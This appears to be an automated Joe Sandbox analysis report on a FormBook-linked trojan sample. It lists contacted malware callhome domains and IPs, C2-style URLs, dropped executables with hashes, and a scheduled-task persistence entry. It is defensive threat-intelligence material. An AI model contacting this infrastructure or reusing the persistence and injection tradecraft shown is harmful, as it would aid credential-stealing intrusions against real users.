http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	Smilet.exe, 00000028.00000001.3704245850.00000000005F2000.00000020.00000001.01000000.00000014.sdmp	false	Avira URL Cloud: safe	unknown
https://shahaf3d.com	hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000372C000.00000004.00000001.00040000.00000000.sdmp	true	Sophos S4: malware callhome domain Avira URL Cloud: malware	unknown
https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	compact.exe, 0000001A.00000002.3721935627.00000000055EA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000422A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://w.ladicdn.com/v2/source/respond.min.js?v=1569310222693	compact.exe, 0000001A.00000002.3721935627.0000000004C7E000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.00000000038BE000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin	compact.exe, 0000001A.00000002.3721935627.00000000055EA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000422A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.leadchanges.info	hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3723441735.000000000519A000.00000040.80000000.00040000.00000000.sdmp	false	Sophos S4: malware repository domain Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	compact.exe, 0000001A.00000003.1817384271.0000000008278000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	compact.exe, 0000001A.00000002.3721935627.00000000055EA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000422A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb	compact.exe, 0000001A.00000002.3721935627.00000000055EA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000001A.00000002.3724493799.0000000006780000.00000004.00000800.00020000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.000000000422A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.futuregainers.net/l4k7/?9d=afjyNtLybwItDht5F4JWljDwa9eg0AOKeO4XK5PuceGx/XGrL/B5lBywYHYqM	compact.exe, 0000001A.00000002.3721935627.0000000004636000.00000004.10000000.00040000.00000000.sdmp, hCVJFOyzXcYEeTIAROhZtqYPJEhCFf.exe, 0000001B.00000002.3720510916.0000000003276000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.1921583639.000000000E196000.00000004.80000000.00040000.00000000.sdmp	false	Sophos S4: malware callhome domain Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
194.9.94.86	www.torentreprenad.com	Sweden	39570	LOOPIASE	false
185.137.235.103	www.klimkina.pro	Russian Federation	49505	SELECTELRU	false
162.0.213.94	www.lenovest.xyz	Canada	35893	ACPCA	true
15.204.0.108	srripaspocon.org	United States	71	HP-INTERNET-ASUS	false
35.214.235.206	www.grecanici.com	United States	19527	GOOGLE-2US	false
18.178.206.118	www.93v0.com	United States	16509	AMAZON-02US	false
195.35.39.119	futuregainers.net	Germany	8359	MTSRU	false
172.82.177.221	www.931951.com	United States	46261	QUICKPACKETUS	false
66.96.162.149	www.leadchanges.info	United States	29873	BIZLAND-SDUS	false
64.46.118.35	shahaf3d.com	United States	32475	SINGLEHOP-LLCUS	true
13.228.81.39	dns.ladipage.com	United States	16509	AMAZON-02US	false
2.56.245.142	unknown	Germany	395800	GBTCLOUDUS	false
162.241.2.254	shopnow321.online	United States	26337	OIS1US	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1452507
Start date and time:	2024-06-05 18:25:12 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	39
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	P1 HWT623ATG.bat.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@32/36@18/13
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 93% Number of executed functions: 208 Number of non-executed functions: 269
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: P1 HWT623ATG.bat.exe

Simulations

Behavior and APIs

Time	Type	Description
12:26:08	API Interceptor	2x Sleep call for process: P1 HWT623ATG.bat.exe modified
12:26:10	API Interceptor	81x Sleep call for process: powershell.exe modified
12:26:14	API Interceptor	2x Sleep call for process: GnVIdcfKFYG.exe modified
14:02:55	API Interceptor	8331895x Sleep call for process: compact.exe modified
18:26:10	Task Scheduler	Run new task: GnVIdcfKFYG path: C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
194.9.94.86	BASF Purchase Order.doc	Get hash	malicious	FormBook	Browse	www.xn--matfrmn-jxa4m.se/ufuh/
	TT-Slip.bat.exe	Get hash	malicious	FormBook	Browse	www.torentreprenad.com/r45o/
	Doc PI.doc	Get hash	malicious	FormBook	Browse	www.xn--matfrmn-jxa4m.se/ufuh/
	Beauty_Stem_Invoice.doc	Get hash	malicious	FormBook	Browse	www.xn--matfrmn-jxa4m.se/ufuh/
	MOQ010524Purchase order.doc	Get hash	malicious	FormBook	Browse	www.xn--matfrmn-jxa4m.se/ufuh/
	SalinaGroup.doc	Get hash	malicious	FormBook	Browse	www.xn--matfrmn-jxa4m.se/ufuh/
	PAY-0129.exe	Get hash	malicious	FormBook	Browse	www.torentreprenad.com/s2u9/?7H=mTJ4yhH&qHaT0h=5U7DALWrxqzr56VTS66DkMzivwb8eJw+QuQWKosT9GGOOJNmCsoJdRf2YtOKiYr885RpspfnWz9oIB8tKqH0jqi0U2E5YHFFFQ==
	DHL_SOA_1004404989.exe	Get hash	malicious	FormBook	Browse	www.torentreprenad.com/s2u9/?j8j=6NzlX4xHmtqH&rR=5U7DALWrxqzr56VMLK7KnfayygnCZIw+QuQWKosT9GGOOJNmCsoJdRf2YtOKiYr885RpspfnWz9oIB8tKqH3pN+aCUsxPyV8FA==
	Scan00516.js	Get hash	malicious	FormBook, MailPassView, WSHRAT	Browse	www.acre-com.com/me15/?i8O=bxl0&VPudI=AMxDUnLLexuTfXRuHqoxzPfeXrfBw2lKu15RcCpXpuJEBCulcUbatn2YVJ6xbnCfmbZZ
	SHIPPINGDOCUMENTS.25.23.exe	Get hash	malicious	FormBook	Browse	www.udda.app/ga36/?-Zk4Ah=uKy05ssFXwD7lx+pwOkpcz0JYvvlr0Fm4k7Q090T/1T8NUAbWqhr3VP8iMZHhaUYUaRp&-ZVd=5jo8nLy8
185.137.235.103	Revised Quotation.bat.exe	Get hash	malicious	FormBook	Browse	www.klimkina.pro/4mpz/
	Payment_status.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.olgache.xyz/m02u/?v48TJHe8=SFlVzogYIMMdTUANsOTzLx46vQlpDm+tJbna1I/IgT07XpqoSAWoIZuH7ImWMSbJQArO&3f=WZgho
	shipping docs.exe	Get hash	malicious	FormBook	Browse	www.profitcase.pro/a8hq/?6lE0=9F4kVHS28g6fbFW6n39DNxIRl6vPALkU9WDIT8w272an5pruXeDeVGVGg1ETeAD2z5Ub&b62tHj=TpTp
162.0.213.94	R00634789001126789_PDF0863.exe	Get hash	malicious	FormBook	Browse	www.chinchap.xyz/e3og/
	aertrh.exe	Get hash	malicious	FormBook	Browse	www.princestun.xyz/n5mw/?mXnt=NtfoMqxWvboNlKrVgjDi+u5ev237R5YpK2NVcn2/0I1oKqymTxIT6zJKN0ZuwJhX9ergv3TNlgjObhSZFizOYVaTR9ZKjKfRg67oZl8/i6Dn1xcrvY8lwbY=&bbtD=v8Pp0x
	TT-Slip.bat.exe	Get hash	malicious	FormBook	Browse	www.lenovest.xyz/e20q/
	RB_VAC_1.EXE.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.chinchap.xyz/t3ue/
	Petro Masila 105321.exe	Get hash	malicious	FormBook	Browse	www.princestun.xyz/4vs4/
	PO 027371.exe	Get hash	malicious	FormBook	Browse	www.princestun.xyz/4vs4/
	PAY-0129.exe	Get hash	malicious	FormBook	Browse	www.chinchap.xyz/s2u9/?qHaT0h=GFiZ4lzykiAkjkYMX1AQruBBlY+JDhm2S0U6V9QE9B/raPoqdxrfdCyyq11B5B9NKxpsF80MvpZc2ueHLfrhP12RIFzpRyMC6A==&7H=mTJ4yhH
	PgbcaAGOnA.exe	Get hash	malicious	FormBook	Browse	www.rigintech.info/q0a9/?1Prd=ibILxh&_LslrNA=P4xybVgLtrThJ7/gdzCFLLBMT5Dy4XS78bWftXfkNvSW5cUDpuLBoMx4Gi0YHaiBE8JTg9kp6HCWmyr4mdTAqsuW8pT+mZB8igPIsbzksFX8
	YPtC8uu6px.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.princestun.xyz/e0ff/?XTw0=ihiX7ruHB4&KRlDHViH=65CIsjiLW3AuUNF9No8Nxn1HOiflu6ZRYLpFciFRuT0aLHZsl2anrsvCkzc5RC4M17iTdgnxPrkoiI97b8zRxzU7NJvigTQfVA==
	Kopje_e_pageses_bankare.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.gadpuch.website/6qne/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.931951.com	TT-Slip.bat.exe	Get hash	malicious	FormBook	Browse	172.82.177.221
www.klimkina.pro	TT Slip.pif.exe	Get hash	malicious	FormBook	Browse	185.137.235.193
	Revised Quotation.bat.exe	Get hash	malicious	FormBook	Browse	185.137.235.103
	TT-Slip.bat.exe	Get hash	malicious	FormBook	Browse	185.137.235.125
www.93v0.com	TT-Slip.bat.exe	Get hash	malicious	FormBook	Browse	18.178.206.118
www.93v0.com	Swift_Copy.exe	Get hash	malicious	FormBook	Browse	18.178.206.118
dns.ladipage.com	TT Slip.pif.exe	Get hash	malicious	FormBook	Browse	54.179.173.60
	Revised Quotation.bat.exe	Get hash	malicious	FormBook	Browse	13.228.81.39
	TT-Slip.bat.exe	Get hash	malicious	FormBook	Browse	54.179.173.60
	BL4567GH67_xls.exe	Get hash	malicious	FormBook	Browse	54.179.173.60
	Scan Document Copy_docx.exe	Get hash	malicious	FormBook	Browse	13.228.81.39
	ungziped_file.exe	Get hash	malicious	FormBook	Browse	13.228.81.39
	SecuriteInfo.com.Win32.PWSX-gen.5935.26892.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	18.139.62.226
	inquiry.exe	Get hash	malicious	FormBook	Browse	13.228.81.39
	purchase order 8MCE15.scr.exe	Get hash	malicious	FormBook	Browse	18.141.244.39
	SecuriteInfo.com.Heur.21813.17790.exe	Get hash	malicious	FormBook	Browse	18.140.75.249
www.lenovest.xyz	TT Slip.pif.exe	Get hash	malicious	FormBook	Browse	162.0.213.94
	Revised Quotation.bat.exe	Get hash	malicious	FormBook	Browse	162.0.213.94
	TT-Slip.bat.exe	Get hash	malicious	FormBook	Browse	162.0.213.94
	dhl-shipment4820911.exe	Get hash	malicious	FormBook	Browse	162.0.213.94

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HP-INTERNET-ASUS	https://www.notism.io/-/716602fa429d680becc7a0edb	Get hash	malicious	Unknown	Browse	15.235.54.6
	TT-Slip.bat.exe	Get hash	malicious	FormBook	Browse	15.204.0.108
	original.eml	Get hash	malicious	Unknown	Browse	15.235.42.36
	http://sjhjbrgehkbhsbvdkshahhhhkjtj.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	15.156.209.62
	SecuriteInfo.com.Win32.TrojanX-gen.9663.10822.exe	Get hash	malicious	Xmrig	Browse	15.235.212.91
	file.exe	Get hash	malicious	SystemBC	Browse	15.204.207.249
	A2G6pO40qG.exe	Get hash	malicious	CMSBrute	Browse	15.204.58.11
	http://info.ipreo.com/Privacy-Policy.html	Get hash	malicious	Unknown	Browse	15.235.15.221
	file.exe	Get hash	malicious	FormBook	Browse	15.235.86.83
	datFGBhnqF.elf	Get hash	malicious	Mirai	Browse	16.143.3.138
LOOPIASE	BASF Purchase Order.doc	Get hash	malicious	FormBook	Browse	194.9.94.86
	TT-Slip.bat.exe	Get hash	malicious	FormBook	Browse	194.9.94.86
	SecuriteInfo.com.Win32.PWSX-gen.24627.22980.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	product Inquiry and RFQ ART LTD.doc	Get hash	malicious	FormBook	Browse	194.9.94.85
	COMMANDE.EXE.exe	Get hash	malicious	DBatLoader, FormBook	Browse	194.9.94.85
	New Order.doc	Get hash	malicious	FormBook	Browse	194.9.94.85
	GXu0Ow8T1h.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	GcwoApxt8q.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	Doc PI.doc	Get hash	malicious	FormBook	Browse	194.9.94.86
	opszx.scr.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
ACPCA	pFvpxWS2lD.exe	Get hash	malicious	FormBook	Browse	162.0.213.72
	rShippingDocuments.exe	Get hash	malicious	FormBook	Browse	162.0.213.72
	R00634789001126789_PDF0863.exe	Get hash	malicious	FormBook	Browse	162.0.213.94
	IiGs0DhviK.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	JiUm2xQj3e.elf	Get hash	malicious	Mirai	Browse	162.60.248.104
	Etisalat Summary Bill for the Month of May.exe	Get hash	malicious	FormBook	Browse	162.55.83.181
	vtIgsP95Bm.exe	Get hash	malicious	FormBook, GuLoader, LummaC Stealer	Browse	162.0.222.196
	Shift - Recipes_spn7g.exe	Get hash	malicious	Unknown	Browse	162.55.95.177
	aertrh.exe	Get hash	malicious	FormBook	Browse	162.0.213.94
	Purchase Order for PCO1881 - PO-24241000210.Pdf.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
SELECTELRU	http://denverrescuemission.org	Get hash	malicious	Unknown	Browse	84.38.182.217
	http://denverrescuemission.org	Get hash	malicious	Unknown	Browse	84.38.182.217
	TT Slip.pif.exe	Get hash	malicious	FormBook	Browse	185.137.235.193
	Revised Quotation.bat.exe	Get hash	malicious	FormBook	Browse	185.137.235.103
	TT-Slip.bat.exe	Get hash	malicious	FormBook	Browse	185.137.235.125
	https://marvin-occentus.net	Get hash	malicious	Unknown	Browse	31.184.209.76
	file.exe	Get hash	malicious	Babuk, Djvu, SmokeLoader	Browse	31.184.254.98
	https://deutsche-post-verfolgung.com/	Get hash	malicious	Unknown	Browse	31.184.253.138
	file.exe	Get hash	malicious	SmokeLoader	Browse	31.184.254.98
	http://alphosoft.com	Get hash	malicious	Unknown	Browse	188.68.221.152
GOOGLE-2US	https://rb.gy/m4jpp5#adprosupport@archdigest.com	Get hash	malicious	HTMLPhisher	Browse	35.214.149.91
	(No subject).eml	Get hash	malicious	Unknown	Browse	35.214.149.91
	http://denverrescuemission.org	Get hash	malicious	Unknown	Browse	35.211.178.172
	https://help-strtrezorio.gitbook.io/	Get hash	malicious	Unknown	Browse	35.214.149.91
	DPqKF5vqpe.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, SystemBC	Browse	35.211.105.54
	https://bizfilehub.com/statement-of-information.php?utm_campaign=Segmenteq&utm_source=1323553&utm_medium=1880848	Get hash	malicious	Unknown	Browse	35.215.124.238
	9hD6o07kwl.exe	Get hash	malicious	FormBook	Browse	35.212.10.247
	https://www.sordum.org/downloads/?ntfs-drive-protection	Get hash	malicious	Unknown	Browse	35.208.249.213
	https://wetransfer.com/downloads/500e7f36ea6ce7e88cbd439526ad9f2e20240603080738/09d4ab8c84f1760fdcaa29af1c10b2c420240603080754/8b8539?trk=TRN_TDL_01&utm_campaign=TRN_TDL_01&utm_medium=email&utm_source=sendgrid	Get hash	malicious	Unknown	Browse	35.214.149.91
	http://telegrum.xyz	Get hash	malicious	Unknown	Browse	35.214.149.91

Process:	C:\Users\user\AppData\Roaming\GnVIdcfKFYG.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\P1 HWT623ATG.bat.exe.log

Process:	C:\Users\user\Desktop\P1 HWT623ATG.bat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Guzzler[1].exe

Process:	C:\Windows\SysWOW64\compact.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	1561888
Entropy (8bit):	7.2941254280913554
Encrypted:	false
SSDEEP:	24576:vh8J9/TrKYI+HM+Ss/aX7F61JCnhglAFjJCF5dz8moz8d:CJcY1HXSs/aXxSsnqmFjJCF5dQmozq
MD5:	9468614D3915F76CE938B93A123E9043
SHA1:	701E2498F724DEDD62DD8589A06DA6B95078C631
SHA-256:	F4DDAAA1F5E462F067E6B1BFA02C7288568D0954F458C598857CFB1796A0EA5B
SHA-512:	A225A590E625A33F9A2213EFC16C3436C9E4A8B782B5C9A7847EC733EC820B8A5F793E037889C7D08651A6DEAFE4EE99D7F1D0ADD8FC314B6BC930C2E10E099E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 11%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..F..F..F.....F..G.w.F.....F..v..F...@..F.Rich.F.........PE..L......].................d...\|......k2............@..........................P............@.................................<...........0Q..............8............................................................................................text....b.......d.................. ..`.rdata..J............h..............@..@.data....U...........\|..............@....ndata...................................rsrc...0Q.......R..................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	8003
Entropy (8bit):	4.840877972214509
Encrypted:	false
SSDEEP:	192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
MD5:	106D01F562D751E62B702803895E93E0
SHA1:	CBF19C2392BDFA8C2209F8534616CCA08EE01A92
SHA-256:	6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
SHA-512:	81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
Malicious:	false
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379460230152629
Encrypted:	false
SSDEEP:	48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:fLHyIFKL3IZ2KRH9Oug8s
MD5:	4DC84D28CF28EAE82806A5390E5721C8
SHA1:	66B6385EB104A782AD3737F2C302DEC0231ADEA2
SHA-256:	1B89BFB0F44C267035B5BC9B2A8692FF29440C0FEE71C636B377751DAF6911C0
SHA-512:	E8F45669D27975B41401419B8438E8F6219AF4D864C46B8E19DC5ECD50BD6CA589BDEEE600A73DDB27F8A8B4FF7318000641B6A59E0A5CDD7BE0C82D969A68DE
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\66159w4

Process:	C:\Windows\SysWOW64\compact.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Smilet.exe

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	1561888
Entropy (8bit):	7.2941254280913554
Encrypted:	false
SSDEEP:	24576:vh8J9/TrKYI+HM+Ss/aX7F61JCnhglAFjJCF5dz8moz8d:CJcY1HXSs/aXxSsnqmFjJCF5dQmozq
MD5:	9468614D3915F76CE938B93A123E9043
SHA1:	701E2498F724DEDD62DD8589A06DA6B95078C631
SHA-256:	F4DDAAA1F5E462F067E6B1BFA02C7288568D0954F458C598857CFB1796A0EA5B
SHA-512:	A225A590E625A33F9A2213EFC16C3436C9E4A8B782B5C9A7847EC733EC820B8A5F793E037889C7D08651A6DEAFE4EE99D7F1D0ADD8FC314B6BC930C2E10E099E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 11%
